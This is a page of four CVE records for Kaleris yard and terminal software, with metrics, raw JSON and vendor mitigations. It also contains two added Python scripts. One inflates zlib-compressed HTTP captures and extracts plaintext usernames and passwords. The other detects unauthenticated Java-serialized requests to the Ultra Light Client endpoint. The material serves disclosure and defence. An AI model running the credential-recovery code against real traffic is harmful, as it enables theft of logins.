
    4 vulnerabilities by Kaleris

    CVE-2026-31151 (GCVE-0-2026-31151)

    Vulnerability from cvelistv5 – Published: 2026-04-06 00:00 – Updated: 2026-04-07 13:48
    Summary
    An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application's resources.
    SSVC
    Exploitation: poc Automatable: yes Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • n/a
    • CWE-288 - Authentication Bypass Using an Alternate Path or Channel
    Assigner: mitre

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-31151",
                    "options": [
                      {
                        "Exploitation": "poc"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-04-07T13:46:47.331460Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-288",
                    "description": "CWE-288 Authentication Bypass Using an Alternate Path or Channel",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-04-07T13:48:27.943Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application \u0027s resources."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-04-06T14:34:03.724Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://kaleris.com/solutions/yard-management/"
            },
            {
              "url": "https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2026-31151",
        "datePublished": "2026-04-06T00:00:00.000Z",
        "dateReserved": "2026-03-09T00:00:00.000Z",
        "dateUpdated": "2026-04-07T13:48:27.943Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-31150 (GCVE-0-2026-31150)

    Vulnerability from cvelistv5 – Published: 2026-04-06 00:00 – Updated: 2026-04-06 15:02
    Summary
    Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck's dashboard resources.
    SSVC
    Exploitation: poc Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • n/a
    • CWE-639 - Authorization Bypass Through User-Controlled Key
    • CWE-284 - Improper Access Control
    Assigner: mitre

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "NONE",
                  "baseScore": 4.3,
                  "baseSeverity": "MEDIUM",
                  "confidentialityImpact": "LOW",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "LOW",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-31150",
                    "options": [
                      {
                        "Exploitation": "poc"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-04-06T15:02:08.855352Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-639",
                    "description": "CWE-639 Authorization Bypass Through User-Controlled Key",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              },
              {
                "descriptions": [
                  {
                    "cweId": "CWE-284",
                    "description": "CWE-284 Improper Access Control",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-04-06T15:02:11.998Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck\u0027s dashboard resources."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-04-06T14:32:02.551Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://kaleris.com/solutions/yard-management/"
            },
            {
              "url": "https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2026-31150",
        "datePublished": "2026-04-06T00:00:00.000Z",
        "dateReserved": "2026-03-09T00:00:00.000Z",
        "dateUpdated": "2026-04-06T15:02:11.998Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2025-5087 (GCVE-0-2025-5087)

    Vulnerability from cvelistv5 – Published: 2025-06-24 18:30 – Updated: 2025-06-24 18:46
    Title
    Cleartext Transmission of Sensitive Information in Kaleris Navis N4
    Summary
    Kaleris NAVIS N4 ULC (Ultra Light Client) communicates insecurely using zlib-compressed data over HTTP. An attacker capable of observing network traffic between Ultra Light Clients and N4 servers can extract sensitive information, including plaintext credentials.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-319 - Cleartext Transmission of Sensitive Information
    Assigner: icscert
    References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-175-01
    Impacted products
    Vendor: Kaleris; Product: Navis N4; Affected: all versions before 4.0 (version range 0 to < 4.0, custom versioning)
    Date Public: 2025-06-24 18:23

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2025-5087",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-06-24T18:46:10.854937Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-06-24T18:46:31.376Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Navis N4",
              "vendor": "Kaleris",
              "versions": [
                {
                  "lessThan": "4.0",
                  "status": "affected",
                  "version": "0",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "datePublic": "2025-06-24T18:23:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003e\u003c/p\u003e\n\n\u003cp\u003eKaleris NAVIS N4 ULC (Ultra Light Client) communicates insecurely using zlib-compressed data over HTTP. An attacker capable of observing network traffic between Ultra Light Clients and N4 servers can extract sensitive information, including plaintext credentials.\u003c/p\u003e"
                }
              ],
              "value": "Kaleris NAVIS N4 ULC (Ultra Light Client) communicates insecurely using zlib-compressed data over HTTP. An attacker capable of observing network traffic between Ultra Light Clients and N4 servers can extract sensitive information, including plaintext credentials."
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "HIGH",
                "attackRequirements": "NONE",
                "attackVector": "NETWORK",
                "baseScore": 6,
                "baseSeverity": "MEDIUM",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "NONE",
                "subIntegrityImpact": "NONE",
                "userInteraction": "PASSIVE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "NONE",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-319",
                  "description": "CWE-319 Cleartext Transmission of Sensitive Information",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2025-06-24T18:30:40.700Z",
            "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
            "shortName": "icscert"
          },
          "references": [
            {
              "tags": [
                "government-resource"
              ],
              "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-175-01"
            }
          ],
          "solutions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eKaleris recommends users to implement the following versions or later:\u003c/p\u003e\u003cul\u003e\u003cli\u003eNavis N4: Version 3.1.44+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.2.26+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.3.27+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.4.25+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.5.18+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.6.14+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.7.0+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.8.0+\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eIf users are unable to update, Kaleris recommends following these mitigations:\u003c/p\u003e\u003cul\u003e\u003cli\u003eIf N4 does not need to be exposed to the internet, placing it behind a firewall.\u003c/li\u003e\u003cli\u003eIf CAP needs to be exposed to the internet, disable the Ultra Light Client on the nodes being exposed. This can be done by blocking the Ultra Light Client URLs in the load balancer or firewall by blocking the following patterns: \"url-pattern*.jnlp\u0026lt;/url-pattern\" and \"url-pattern/ulc\u0026lt;/url-pattern\"\u003c/li\u003e\u003cli\u003eThe Ultra Light Client endpoint can also be disabled on the N4 Cluster node by commenting out relevant code in the web.xml file and restarting the server.\u003c/li\u003e\u003cli\u003eIf the Ultra Light Client must be exposed to the Internet, do one of the following:\u003cbr\u003ea. Set up a secure VPN connection to allow access for known external parties.\u003cbr\u003eb. Set up an authenticated jump system (Citrix, VDI, Etc.).\u003cbr\u003ec. Whitelist external allowed IPs. (least secure option)\u003c/li\u003e\u003cli\u003eAdditionally, the following controls should be applied:\u003cbr\u003ea. Restrict the number of N4 nodes exposed to the internet.\u003cbr\u003eb. Ensure that HTTPS is enabled and configured on the filewall/loadbalancer.\u003cbr\u003ec. Use a reliable third-party party firewall with built in DDOS protection that can detect unwanted intrusions.\u003c/li\u003e\u003cli\u003eUsers are required to implement TLS in their load balancer. The setup for this is included in the Application Security Guide that is provided to all users.\u003c/li\u003e\u003cli\u003eA final option to consider is upgrading to N4 4.0, where the Ultra Light Client has been fully replaced with the HTML UI.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eKaleris has sent a security advisory to all customers running Kaleris software.\u003c/p\u003e\u003cp\u003eFor more information, users should email \u003ca target=\"_blank\" rel=\"nofollow\"\u003esecurity@kaleris.com\u003c/a\u003e\u003c/p\u003e\n\n\u003cbr\u003e"
                }
              ],
              "value": "Kaleris recommends users to implement the following versions or later:\n\n  *  Navis N4: Version 3.1.44+\n  *  Navis N4: Version 3.2.26+\n  *  Navis N4: Version 3.3.27+\n  *  Navis N4: Version 3.4.25+\n  *  Navis N4: Version 3.5.18+\n  *  Navis N4: Version 3.6.14+\n  *  Navis N4: Version 3.7.0+\n  *  Navis N4: Version 3.8.0+\n\n\nIf users are unable to update, Kaleris recommends following these mitigations:\n\n  *  If N4 does not need to be exposed to the internet, placing it behind a firewall.\n  *  If CAP needs to be exposed to the internet, disable the Ultra Light Client on the nodes being exposed. This can be done by blocking the Ultra Light Client URLs in the load balancer or firewall by blocking the following patterns: \"url-pattern*.jnlp\u003c/url-pattern\" and \"url-pattern/ulc\u003c/url-pattern\"\n  *  The Ultra Light Client endpoint can also be disabled on the N4 Cluster node by commenting out relevant code in the web.xml file and restarting the server.\n  *  If the Ultra Light Client must be exposed to the Internet, do one of the following:\na. Set up a secure VPN connection to allow access for known external parties.\nb. Set up an authenticated jump system (Citrix, VDI, Etc.).\nc. Whitelist external allowed IPs. (least secure option)\n  *  Additionally, the following controls should be applied:\na. Restrict the number of N4 nodes exposed to the internet.\nb. Ensure that HTTPS is enabled and configured on the filewall/loadbalancer.\nc. Use a reliable third-party party firewall with built in DDOS protection that can detect unwanted intrusions.\n  *  Users are required to implement TLS in their load balancer. The setup for this is included in the Application Security Guide that is provided to all users.\n  *  A final option to consider is upgrading to N4 4.0, where the Ultra Light Client has been fully replaced with the HTML UI.\n\n\nKaleris has sent a security advisory to all customers running Kaleris software.\n\nFor more information, users should email security@kaleris.com"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Cleartext Transmission of Sensitive Information in Kaleris Navis N4",
          "x_generator": {
            "engine": "Vulnogram 0.2.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "assignerShortName": "icscert",
        "cveId": "CVE-2025-5087",
        "datePublished": "2025-06-24T18:30:40.700Z",
        "dateReserved": "2025-05-22T15:55:28.362Z",
        "dateUpdated": "2025-06-24T18:46:31.376Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
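The CVE-2025-5087 record above says the Ultra Light Client sends zlib-compressed messages over plain HTTP and that anyone observing the traffic can pull plaintext credentials out of them. The point worth making concrete is that compression hides text from a casual grep of the wire bytes but gives an attacker nothing to break. The script below is an added example, not Kaleris, CISA or N4 code: it scans a captured HTTP message for zlib stream headers, inflates whatever it finds, and extracts credential-looking fields. The login message layout, field names, path and host are constructed for illustration; nothing about the real N4 wire format is taken from the advisory beyond "zlib over HTTP".

```python
"""Recover credentials from zlib-compressed HTTP traffic (CWE-319).

Added example for the CVE-2025-5087 record; not Kaleris, CISA or N4 code.
The message layout, field names and host are assumptions for illustration.
"""
import re
import zlib

MAX_INFLATED = 1 << 20  # 1 MiB cap so a hostile capture cannot zip-bomb the analyst


def zlib_stream_offsets(payload: bytes):
    """Yield offsets where an RFC 1950 zlib header plausibly starts.

    CMF 0x78 = deflate with a 32 KiB window (zlib's default), and
    (CMF * 256 + FLG) must be divisible by 31.
    """
    for i in range(len(payload) - 1):
        cmf, flg = payload[i], payload[i + 1]
        if cmf == 0x78 and (cmf * 256 + flg) % 31 == 0:
            yield i


def inflate_all(payload: bytes) -> list:
    """Inflate every complete zlib stream embedded in a raw buffer.

    Candidates that do not decode to a complete, checksum-verified stream are
    dropped, which filters out false positives from random 0x78 bytes.
    """
    streams = []
    for off in zlib_stream_offsets(payload):
        d = zlib.decompressobj()
        try:
            data = d.decompress(payload[off:], MAX_INFLATED)
        except zlib.error:
            continue
        if d.eof:  # whole stream consumed, adler32 checked by zlib
            streams.append(data)
    return streams


def http_body(raw: bytes) -> bytes:
    """Split an HTTP/1.1 message at the blank line and return the body."""
    _head, sep, body = raw.partition(b"\r\n\r\n")
    return body if sep else b""


# key=value pairs whose key looks like a credential field
CRED_RE = re.compile(rb"(user(?:name)?|pass(?:word)?)=([^&\s]+)", re.IGNORECASE)


def extract_credentials(texts) -> dict:
    found = {}
    for text in texts:
        for m in CRED_RE.finditer(text):
            found[m.group(1).decode().lower()] = m.group(2).decode(errors="replace")
    return found


def recover_from_capture(raw_http: bytes) -> dict:
    """What a passive on-path observer gets from one captured request."""
    return extract_credentials(inflate_all(http_body(raw_http)))


def constructed_capture() -> bytes:
    """CONSTRUCTED sample: a login posted zlib-compressed over plain HTTP.

    Field names and path are invented for the example, not the N4 wire format.
    """
    plaintext = b"action=login&username=yardop&password=S3cret!&client=ulc"
    body = zlib.compress(plaintext)
    return (
        b"POST /ulc HTTP/1.1\r\n"
        b"Host: n4.example.internal\r\n"
        b"Content-Type: application/octet-stream\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"\r\n" + body
    )


if __name__ == "__main__":
    cap = constructed_capture()
    # A byte-level grep of the wire data does not see the credential field;
    # inflating the body recovers it with no key or secret required.
    print("grep sees 'password':", b"password" in cap)
    print("observer recovers:", recover_from_capture(cap))
```

On a real capture you would feed the reassembled TCP stream (for example the output of a Wireshark "Follow TCP Stream" export) to `inflate_all` rather than a single request; the header scan finds each embedded stream wherever it starts. The fix is the one the advisory gives, TLS on the load balancer in front of N4 or removing the ULC entirely, because no amount of compression changes what a passive observer can read.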

    CVE-2025-2566 (GCVE-0-2025-2566)

    Vulnerability from cvelistv5 – Published: 2025-06-24 18:27 – Updated: 2025-06-24 18:47
    Title
    Deserialization of Untrusted Data in Kaleris Navis N4
    Summary
    Kaleris NAVIS N4 ULC (Ultra Light Client) contains an unsafe Java deserialization vulnerability. An unauthenticated attacker can make specially crafted requests to execute arbitrary code on the server.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-502 - Deserialization of Untrusted Data
    Assigner: icscert
    References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-175-01
    Impacted products
    Vendor: Kaleris; Product: Navis N4; Affected: all versions before 4.0 (version range 0 to < 4.0, custom versioning)
    Date Public: 2025-06-24 18:23

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2025-2566",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-06-24T18:47:18.544221Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-06-24T18:47:46.713Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Navis N4",
              "vendor": "Kaleris",
              "versions": [
                {
                  "lessThan": "4.0",
                  "status": "affected",
                  "version": "0",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "datePublic": "2025-06-24T18:23:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eKaleris NAVIS N4 ULC (Ultra Light Client) contains an unsafe Java deserialization vulnerability. An unauthenticated attacker can make specially crafted requests to execute arbitrary code on the server.\u003c/p\u003e\u003cbr\u003e"
                }
              ],
              "value": "Kaleris NAVIS N4 ULC (Ultra Light Client) contains an unsafe Java deserialization vulnerability. An unauthenticated attacker can make specially crafted requests to execute arbitrary code on the server."
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "NETWORK",
                "baseScore": 9.3,
                "baseSeverity": "CRITICAL",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "NONE",
                "subIntegrityImpact": "NONE",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "HIGH",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "HIGH",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-502",
                  "description": "CWE-502 Deserialization of Untrusted Data",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2025-06-24T18:27:21.479Z",
            "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
            "shortName": "icscert"
          },
          "references": [
            {
              "tags": [
                "government-resource"
              ],
              "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-175-01"
            }
          ],
          "solutions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eKaleris recommends users to implement the following versions or later:\u003c/p\u003e\u003cul\u003e\u003cli\u003eNavis N4: Version 3.1.44+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.2.26+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.3.27+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.4.25+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.5.18+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.6.14+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.7.0+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.8.0+\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eIf users are unable to update, Kaleris recommends following these mitigations:\u003c/p\u003e\u003cul\u003e\u003cli\u003eIf N4 does not need to be exposed to the internet, placing it behind a firewall.\u003c/li\u003e\u003cli\u003eIf CAP needs to be exposed to the internet, disable the Ultra Light Client on the nodes being exposed. This can be done by blocking the Ultra Light Client URLs in the load balancer or firewall by blocking the following patterns: \"url-pattern*.jnlp\u0026lt;/url-pattern\" and \"url-pattern/ulc\u0026lt;/url-pattern\"\u003c/li\u003e\u003cli\u003eThe Ultra Light Client endpoint can also be disabled on the N4 Cluster node by commenting out relevant code in the web.xml file and restarting the server.\u003c/li\u003e\u003cli\u003eIf the Ultra Light Client must be exposed to the Internet, do one of the following:\u003cbr\u003ea. Set up a secure VPN connection to allow access for known external parties.\u003cbr\u003eb. Set up an authenticated jump system (Citrix, VDI, Etc.).\u003cbr\u003ec. Whitelist external allowed IPs. (least secure option)\u003c/li\u003e\u003cli\u003eAdditionally, the following controls should be applied:\u003cbr\u003ea. Restrict the number of N4 nodes exposed to the internet.\u003cbr\u003eb. Ensure that HTTPS is enabled and configured on the filewall/loadbalancer.\u003cbr\u003ec. Use a reliable third-party party firewall with built in DDOS protection that can detect unwanted intrusions.\u003c/li\u003e\u003cli\u003eUsers are required to implement TLS in their load balancer. The setup for this is included in the Application Security Guide that is provided to all users.\u003c/li\u003e\u003cli\u003eA final option to consider is upgrading to N4 4.0, where the Ultra Light Client has been fully replaced with the HTML UI.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eKaleris has sent a security advisory to all customers running Kaleris software.\u003c/p\u003e\u003cp\u003eFor more information, users should email \u003ca target=\"_blank\" rel=\"nofollow\"\u003esecurity@kaleris.com\u003c/a\u003e\u003c/p\u003e\n\n\u003cbr\u003e"
                }
              ],
              "value": "Kaleris recommends users to implement the following versions or later:\n\n  *  Navis N4: Version 3.1.44+\n  *  Navis N4: Version 3.2.26+\n  *  Navis N4: Version 3.3.27+\n  *  Navis N4: Version 3.4.25+\n  *  Navis N4: Version 3.5.18+\n  *  Navis N4: Version 3.6.14+\n  *  Navis N4: Version 3.7.0+\n  *  Navis N4: Version 3.8.0+\n\n\nIf users are unable to update, Kaleris recommends following these mitigations:\n\n  *  If N4 does not need to be exposed to the internet, placing it behind a firewall.\n  *  If CAP needs to be exposed to the internet, disable the Ultra Light Client on the nodes being exposed. This can be done by blocking the Ultra Light Client URLs in the load balancer or firewall by blocking the following patterns: \"url-pattern*.jnlp\u003c/url-pattern\" and \"url-pattern/ulc\u003c/url-pattern\"\n  *  The Ultra Light Client endpoint can also be disabled on the N4 Cluster node by commenting out relevant code in the web.xml file and restarting the server.\n  *  If the Ultra Light Client must be exposed to the Internet, do one of the following:\na. Set up a secure VPN connection to allow access for known external parties.\nb. Set up an authenticated jump system (Citrix, VDI, Etc.).\nc. Whitelist external allowed IPs. (least secure option)\n  *  Additionally, the following controls should be applied:\na. Restrict the number of N4 nodes exposed to the internet.\nb. Ensure that HTTPS is enabled and configured on the filewall/loadbalancer.\nc. Use a reliable third-party party firewall with built in DDOS protection that can detect unwanted intrusions.\n  *  Users are required to implement TLS in their load balancer. The setup for this is included in the Application Security Guide that is provided to all users.\n  *  A final option to consider is upgrading to N4 4.0, where the Ultra Light Client has been fully replaced with the HTML UI.\n\n\nKaleris has sent a security advisory to all customers running Kaleris software.\n\nFor more information, users should email security@kaleris.com"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Deserialization of Untrusted Data in Kaleris Navis N4",
          "x_generator": {
            "engine": "Vulnogram 0.2.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "assignerShortName": "icscert",
        "cveId": "CVE-2025-2566",
        "datePublished": "2025-06-24T18:27:21.479Z",
        "dateReserved": "2025-03-20T16:48:15.650Z",
        "dateUpdated": "2025-06-24T18:47:46.713Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
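Both N4 records carry the same mitigation text: block the `*.jnlp` and `/ulc` url-patterns at the load balancer or firewall, or comment the Ultra Light Client mappings out of web.xml and restart. An operator needs a way to verify that this actually took effect, and, for CVE-2025-2566 specifically, a way to notice unauthenticated serialized-object requests still arriving at the ULC endpoint. The script below is an added example, not Kaleris, CISA or N4 code. Only the two url-patterns come from the advisory; the web.xml and the request samples are constructed stand-ins, because the real N4 descriptor and wire traffic are not described on this page. It implements servlet-spec url-pattern matching (extension, path-prefix, exact) so the same check works for a load-balancer rule and for the descriptor.

```python
"""Audit ULC exposure on an N4-style node and flag serialized-object requests.

Added example for the CVE-2025-2566 / CVE-2025-5087 mitigations; not Kaleris,
CISA or N4 code. The "*.jnlp" and "/ulc" patterns are from the advisory; the
web.xml and request samples are CONSTRUCTED stand-ins.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

ULC_PATTERNS = ("*.jnlp", "/ulc")        # from the Kaleris mitigation text
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # java.io.ObjectOutputStream header


def servlet_pattern_matches(pattern: str, path: str) -> bool:
    """Servlet-spec url-pattern matching: extension (*.x), prefix (/p/*) or exact."""
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    return path == pattern


def _local(tag: str) -> str:
    """Strip the Java EE namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def active_ulc_mappings(web_xml: str) -> list:
    """Return (servlet-name, url-pattern) pairs that still expose ULC.

    ElementTree drops XML comments, so a mapping commented out as the
    advisory suggests simply does not show up here.
    """
    hits = []
    for elem in ET.fromstring(web_xml).iter():
        if _local(elem.tag) != "servlet-mapping":
            continue
        name = pattern = ""
        for child in elem:
            if _local(child.tag) == "servlet-name":
                name = (child.text or "").strip()
            elif _local(child.tag) == "url-pattern":
                pattern = (child.text or "").strip()
        if pattern in ULC_PATTERNS or pattern.startswith("/ulc"):
            hits.append((name, pattern))
    return hits


def triage_request(method: str, url: str, body: bytes, authenticated: bool) -> str:
    """Classify one HTTP request against the ULC attack surface."""
    path = urlsplit(url).path
    hits_ulc = any(servlet_pattern_matches(p, path) for p in ULC_PATTERNS)
    serialized = body.startswith(JAVA_SERIAL_MAGIC)
    if hits_ulc and serialized and not authenticated:
        # The shape of CVE-2025-2566: unauthenticated, crafted, deserialized server-side.
        return "ALERT: unauthenticated Java-serialized object sent to ULC endpoint"
    if hits_ulc:
        return "WARN: ULC endpoint reachable"
    if serialized:
        return "INFO: serialized object on non-ULC path"
    return "ok"


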